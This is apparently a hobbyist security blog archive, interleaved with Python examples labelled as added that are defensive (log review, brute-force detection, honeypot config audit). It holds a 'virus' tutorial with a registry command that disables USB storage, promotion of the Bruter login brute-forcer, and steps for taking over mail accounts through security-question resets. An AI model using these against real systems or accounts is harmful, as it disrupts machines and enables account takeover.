Thursday, April 8, 2010

Developing your own VIRUS (Vital Information Resource Under Seize)

A virus is an application that runs as a system process and makes the OS deviate from its normal behaviour.
A virus can be coded in any programming language: Batch, Shell, VBScript, JScript, C, C++, Perl, Delphi, Python, Haskell, etc.
We will look at a simple self-destructing "virus" in C.

#include <stdio.h>

/* Self-deleting program. argv[0] holds the path the program was started
   with (the original used Turbo C's global _argv and conio's getch()).
   Under 16-bit DOS the file is deleted; 32-bit Windows locks a running
   image, so remove() fails there and perror() reports it. */
int main(int argc, char *argv[])
{
    printf("This program will destroy itself if u press any key!!!\n");
    getchar();
    if (remove(argv[0]) != 0)
        perror("remove");
    return 0;
}

Compile the above program into an EXE. Running it removes the EXE file.

Disabling USB Ports using a simple program

#include <stdlib.h>

/* Disables USB mass storage by setting the USBSTOR driver's Start value to
   4 (disabled). Needs administrator rights; the default is 3 (start on
   demand), so writing 3 back re-enables USB storage. The original had
   "\/" in the string, which is not a valid C escape sequence. */
int main(void)
{
    return system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR /v Start /t REG_DWORD /d 4 /f");
}

With a thorough understanding of every function of an OS and the basic skill of calling system functions from a programming language, anyone can code their own virus!!!!

Tuesday, April 6, 2010

5 Steps for Improving Skills in Network Security (Ethical hacking)

With the increase in cyber threats, many of us are interested in learning more about hacking; it is one of the most commonly googled terms.

Steps I suggest to improve your expertise in Ethical Hacking or Network Security :)
1) Strong fundamentals of an operating system: how an OS boots, how everything works, how an .exe works, how a .dll works, how a drive autoruns, etc.
2) Detailed understanding of network protocols (TCP, ICMP, FTP, HTTP, TELNET, NETBIOS, etc.), because each of these protocols can, in one way or another, be used to divert a system from its routine use.
3) Reverse engineering, or dissecting an EXE file; for this you should have knowledge of ASSEMBLY language.
4) Understanding of programming languages, to understand a system language or web application language. Even if you don't know the language, you should be in a position to understand the program. Don't think it's funny: how can you understand a program without knowing the language? Whatever the programming language, they share basic constructs such as data types, I/O and cryptographic functions, so you can carry what you know of one language over to another.
5) How a web application works. PHP is recommended since it is open source and it is used as the main source for malware distribution and infection.

Follow the above steps and work with dedication, and anyone can become a good security analyst :) :)

Saturday, February 13, 2010

Hacking Google, Yahoo , Live etc ? Is it possible?

Now and then we hear from friends or neighbours that their Gmail or Yahoo account has been hacked. The term "hack" is used very frequently. Let me try to define hacking: hacking is the art of exploiting web servers, mail servers, etc. without the victim knowing that data has been stolen from their servers.

Gmail, a service provided by Google, and Yahoo! Mail, a service provided by Yahoo!, spend billions of dollars on their security. They treat the security of their services as the primary concern; if it were true that Gmail or Ymail could be hacked so easily, why would people use such services???
It is all a misconception that has been growing among people that Gmail or Ymail hacking is easy. People are believing rumours.

My intention in writing this article is to create awareness among the people who believe that Gmail or Ymail has been hacked.

I want to discuss one technique used by some people trying to get the password of a Yahoo mail account.
VICTIM: the person whose password is being reset (misinterpreted as hacked)
MALPERSON: the person who is trying to reset the VICTIM's password
MALPERSON is someone who knows the VICTIM's details, like date of birth, PIN code, country or security questions; knowing these, the password can be reset easily.
MALPERSON opens Yahoo mail, clicks the Forgot Password option, enters the Yahoo! ID, answers the security questions correctly and changes the password, secondary email, etc.
People misinterpret this as hacking. It is a trick played by many people.

Gmail sends its password recovery option to the secondary email. Most people use their Yahoo email as the secondary email address; people take advantage of this and reset both passwords.

Note: If your email password has been reset, it was most likely done by a person who knows you (chances are high). Only a person who knows the victim well can answer his questions perfectly.

Is it possible to know whether some other person has entered our email or not???
Yes, it is possible to know if anyone has logged into our email account: check the IP address log, provided you know the public IP address of the system you last used to log in to your mail account.

So friends, please don't be under the misconception that Gmail or Yahoo can be hacked.
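The IP address log check described above, as an added example that is not part of the original post: a constructed "recent activity" log (the real format differs per provider) is parsed, sign-ins from addresses the owner does not recognise are listed, and any password reset or secondary-email change made from such an address is flagged, since that is exactly the trail the recovery trick described above leaves behind.

```python
# Added example (not from the original post): review a constructed mail
# provider activity log and flag sign-ins and account changes from
# addresses the account owner does not recognise.
from collections import defaultdict

# Constructed sample log: timestamp, source IP, action, result.
ACTIVITY_LOG = """\
2010-02-10T08:12:03Z 203.0.113.7   login                   ok
2010-02-11T19:40:11Z 203.0.113.7   login                   ok
2010-02-12T02:15:44Z 198.51.100.23 password_reset          ok
2010-02-12T02:17:09Z 198.51.100.23 login                   ok
2010-02-12T02:18:30Z 198.51.100.23 secondary_email_changed ok
"""

# The owner's own public address(es); assumed known, as the post requires.
KNOWN_IPS = {"203.0.113.7"}
# Actions that change who controls the account.
SENSITIVE = {"password_reset", "secondary_email_changed"}


def parse_activity(text):
    """Turn the log text into a list of event dicts, skipping malformed lines."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, ip, action, result = parts
        events.append({"ts": ts, "ip": ip, "action": action, "result": result})
    return events


def review(events, known_ips):
    """Return (unknown_ips, sensitive_events): addresses not in known_ips,
    and the account-control changes made from those addresses."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)
    unknown = sorted(ip for ip in by_ip if ip not in known_ips)
    sensitive = [e for e in events
                 if e["ip"] not in known_ips and e["action"] in SENSITIVE]
    return unknown, sensitive


if __name__ == "__main__":
    unknown, sensitive = review(parse_activity(ACTIVITY_LOG), KNOWN_IPS)
    print("unfamiliar addresses:", unknown)
    for e in sensitive:
        print(f"{e['ts']} {e['ip']} {e['action']}")
```

A reset followed within minutes by a login and a secondary-email change from one unfamiliar address is the pattern to look for; the secondary-email change is what lets the other party keep control after the owner notices.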

Saturday, September 12, 2009

Simplified Data Processing of PetaBytes of Data Used By Google

Google currently processes over 20 petabytes of data per day through an average of 100,000 MapReduce jobs spread across its massive computing clusters. The average MapReduce job ran across approximately 400 machines in September 2007, crunching approximately 11,000 machine years in a single month. These are just some of the facts about the search giant's computational processing infrastructure revealed in an ACM paper by Google Fellows Jeffrey Dean and Sanjay Ghemawat.

Twenty petabytes (20,000 terabytes) per day is a tremendous amount of data processing and a key contributor to Google's continued market dominance. Competing search storage and processing systems at Microsoft (Dryad) and Yahoo! (Hadoop) are still playing catch-up to Google's suite of GFS, MapReduce, and BigTable.

MapReduce statistics for different months

                              Aug. 2004   Mar. 2006   Sep. 2007
Number of jobs (1000s)               29         171       2,217
Avg. completion time (secs)         634         874         395
Machine years used                  217       2,002      11,081
Map input data (TB)               3,288      52,254     403,152
Map output data (TB)                758       6,743      34,774
Reduce output data (TB)             193       2,970      14,018
Avg. machines per job               157         268         394
Unique implementations
  map                               395       1,958       4,083
  reduce                            269       1,208       2,418

Google processes its data on a standard machine cluster node consisting of two 2 GHz Intel Xeon processors with Hyper-Threading enabled, 4 GB of memory, two 160 GB IDE hard drives and a gigabit Ethernet link. This type of machine costs approximately $2400 each through providers such as Penguin Computing or Dell, or approximately $900 a month through a managed hosting provider such as Verio (for startup comparisons).

The average MapReduce job runs across a $1 million hardware cluster, not including bandwidth fees, datacenter costs, or staffing.

Here is the presentation by Jeffrey and Sanjay.

Monday, March 2, 2009

Parallel Network Brute Force ****** BRUTER******

Here I want to introduce, to everyone who is aware of brute-forcing, a new tool that increases the speed of brute-forcing over the network: BRUTER.

Bruter is a parallel network login brute-forcer on Win32. This tool is intended to demonstrate the importance of choosing strong passwords. The goal of Bruter is to support a variety of services that allow remote authentication.

It currently supports the following services:

  • FTP
  • HTTP (Basic)
  • HTTP (Form)
  • IMAP
  • MSSQL
  • MySQL
  • POP3
  • SMB-NT
  • SMTP
  • SNMP
  • SSH2
  • Telnet
  • VNC
I am not posting the link...... Google it, download it and test it :)
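The map/shuffle/reduce shape described in the MapReduce post above, applied to the defensive side of what the Bruter post demonstrates: a login brute-forcer produces many authentication failures from one source, and counting failures per source is a natural map/reduce job. This is an added example, not code from either post, from Google's MapReduce or from the Bruter project; the auth-log lines are constructed in sshd style, and a single process split into a few "workers" stands in for the cluster.

```python
# Added example: a toy MapReduce pipeline (map -> shuffle -> reduce) that
# counts failed logins per source address from constructed sshd-style
# log lines, then reports the sources that look like a brute-force run.
import re
from collections import defaultdict
from itertools import chain

# Constructed sample lines; not from any real host.
AUTH_LOG = """\
Mar  2 10:00:01 host sshd[4100]: Failed password for root from 198.51.100.9 port 50122 ssh2
Mar  2 10:00:02 host sshd[4101]: Failed password for admin from 198.51.100.9 port 50123 ssh2
Mar  2 10:00:02 host sshd[4102]: Failed password for invalid user test from 198.51.100.9 port 50124 ssh2
Mar  2 10:00:03 host sshd[4103]: Accepted password for alice from 203.0.113.5 port 40001 ssh2
Mar  2 10:00:04 host sshd[4104]: Failed password for alice from 203.0.113.5 port 40002 ssh2
Mar  2 10:00:05 host sshd[4105]: Failed password for root from 198.51.100.9 port 50125 ssh2
"""

FAILED = re.compile(
    r"Failed password for (?:invalid user )?(\S+) from (\d+\.\d+\.\d+\.\d+)")


def map_line(line):
    """Map phase: emit (source_ip, 1) for a failed login, nothing otherwise."""
    m = FAILED.search(line)
    return [(m.group(2), 1)] if m else []


def shuffle(pairs):
    """Shuffle phase: group intermediate (key, value) pairs by key."""
    groups = defaultdict(list)
    for key, value in pairs:
        groups[key].append(value)
    return groups


def reduce_counts(key, values):
    """Reduce phase: fold one key's values into a total."""
    return key, sum(values)


def mapreduce(lines, mapper, reducer, workers=3):
    """Split the input across `workers` chunks (stand-in for cluster nodes),
    run the mapper on every record, shuffle, then reduce each key."""
    chunks = [lines[i::workers] for i in range(workers)]
    intermediate = chain.from_iterable(mapper(line) for chunk in chunks for line in chunk)
    return dict(reducer(k, v) for k, v in shuffle(intermediate).items())


def failed_logins_per_source(log_text):
    return mapreduce(log_text.splitlines(), map_line, reduce_counts)


def brute_force_sources(log_text, threshold=3):
    """Source addresses whose failed-login count reaches the threshold."""
    counts = failed_logins_per_source(log_text)
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for ip, n in sorted(brute_force_sources(AUTH_LOG).items()):
        print(f"{ip}: {n} failed logins")
```

Because the reducer only ever sees values for one key at a time, the same pipeline scales out by running map_line on each node's log files and routing each source address to one reducer, which is the point of the model; on a single host the same counting is what tools like fail2ban do before blocking a source.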

Saturday, September 1, 2007

Creating a Honey pot using Nepenthes

Get a copy of Debian and install it.

Download Nepenthes http://nepenthes.carnivore.it/download

Once the base install of Debian has finished, it would be a good idea to set a static IP address on the main network adaptor (eth0 in my case); to do this open up /etc/network/interfaces with nano:

# nano /etc/network/interfaces

Change the line:

iface eth0 inet dhcp

To:

iface eth0 inet static

Add the static IP information underneath that line:

address 192.168.0.240
netmask 255.255.255.0
network 192.168.0.0
broadcast 192.168.0.255
gateway 192.168.0.1

Obviously you may want to adjust these to suit your own network; it’s worth double checking /etc/resolv.conf to see that the correct DNS server is in place. Make the changes live with:

# /etc/init.d/networking restart
# ifup eth0

Now make sure the system is up to date:

# apt-get update
# apt-get upgrade

Remove the exim4 MTA, as it would otherwise stop the honeypot from listening on port 25:

# apt-get remove exim4

And install Nepenthes with its associated dependencies:

# apt-get install nepenthes

Once Nepenthes is installed there is actually very little configuration to be done to get things up and running. First of all, open up /etc/nepenthes/nepenthes.conf and see that the following lines are not commented out:

    "submitfile.so"    "submit-file.conf"
    "submitnorman.so"    "submit-norman.conf"
    "logdownload.so"    "log-download.conf"

Also change replace_local_ips to 0.

Now check the configuration files named above; they are all found in the /etc/nepenthes directory.

Inside submit-file.conf, you will find the path to a directory in your filesystem. This is where downloaded malware will be stored.

Norman sandbox is an automated malware analyser. Enter a valid e-mail address in submit-norman.conf; malware captured by your honeypot will be submitted to the Norman analyser and reports on the analysis will be sent to this address.

The file log-download.conf specifies the location of log files that will list downloaded malware and malware submissions.

Now restart Nepenthes with the updated configuration (the installation may have started it with the default config):

# /etc/init.d/nepenthes restart
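A check for the nepenthes.conf edits called for above, as an added example that is not part of the original walkthrough or of the Nepenthes project. It assumes the file layout suggested by the lines quoted above (a module line is a quoted .so name followed by a quoted config name, replace_local_ips is a plain setting, and comments start with // or #); the sample config is constructed and shows the "before" state, so the audit reports what still needs changing and apply_fixes produces the corrected text.

```python
# Added example: audit a nepenthes.conf for the three submit/log modules
# being uncommented and replace_local_ips being 0, and apply those fixes.
# File format is an assumption based on the lines quoted in the walkthrough.
import re

REQUIRED_MODULES = {"submitfile.so", "submitnorman.so", "logdownload.so"}

# Constructed sample resembling an unedited config: one module still
# commented out with "//" and replace_local_ips still 1.
SAMPLE_CONF = """\
nepenthes
{
    modules
    {
        "submitfile.so"      "submit-file.conf"
//      "submitnorman.so"    "submit-norman.conf"
        "logdownload.so"     "log-download.conf"
    };
    replace_local_ips 1;
};
"""

COMMENT_PREFIXES = ("//", "#")
MODULE_RE = re.compile(r'^\s*"([^"]+\.so)"\s+"([^"]+)"')
SETTING_RE = re.compile(r'^\s*replace_local_ips\s+"?(\d+)"?')


def is_comment(line):
    return line.lstrip().startswith(COMMENT_PREFIXES)


def audit(conf_text):
    """Return the list of deviations from the walkthrough; empty means OK."""
    enabled, replace_local_ips = set(), None
    for line in conf_text.splitlines():
        if is_comment(line):
            continue                      # a commented-out module is not loaded
        m = MODULE_RE.match(line)
        if m:
            enabled.add(m.group(1))
            continue
        m = SETTING_RE.match(line)
        if m:
            replace_local_ips = int(m.group(1))
    problems = [f"module {mod} is not enabled"
                for mod in sorted(REQUIRED_MODULES - enabled)]
    if replace_local_ips != 0:
        problems.append(f"replace_local_ips is {replace_local_ips}, expected 0")
    return problems


def apply_fixes(conf_text):
    """Uncomment the required module lines and force replace_local_ips to 0."""
    out = []
    for line in conf_text.splitlines():
        if is_comment(line) and any(f'"{mod}"' in line for mod in REQUIRED_MODULES):
            line = re.sub(r"^\s*(//|#)", "", line, count=1)
        line = re.sub(r'replace_local_ips\s+"?\d+"?', "replace_local_ips 0", line)
        out.append(line)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    for problem in audit(SAMPLE_CONF):
        print("before:", problem)
    print("after:", audit(apply_fixes(SAMPLE_CONF)) or "config matches the walkthrough")
```

Run the audit against the real /etc/nepenthes/nepenthes.conf before restarting the service; if the module lines there use a spacing or comment style this check does not recognise, adjust MODULE_RE and COMMENT_PREFIXES rather than trusting an empty result.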

The last step very much depends on the router/firewall in use. In my case, I’m using a Netgear ADSL router; this allows me to set a DMZ destination. The router then passes all incoming traffic to this address if there is no other rule defined for that particular port. If your router does not have a DMZ feature, you can manually redirect incoming connections on interesting ports to the Nepenthes collector.

I found it quite alarming how quickly Nepenthes started to collect information about attempted break-ins and automated malware downloads! It's very interesting to see the large number of entries for 'Unknown DCOM Shellcode'.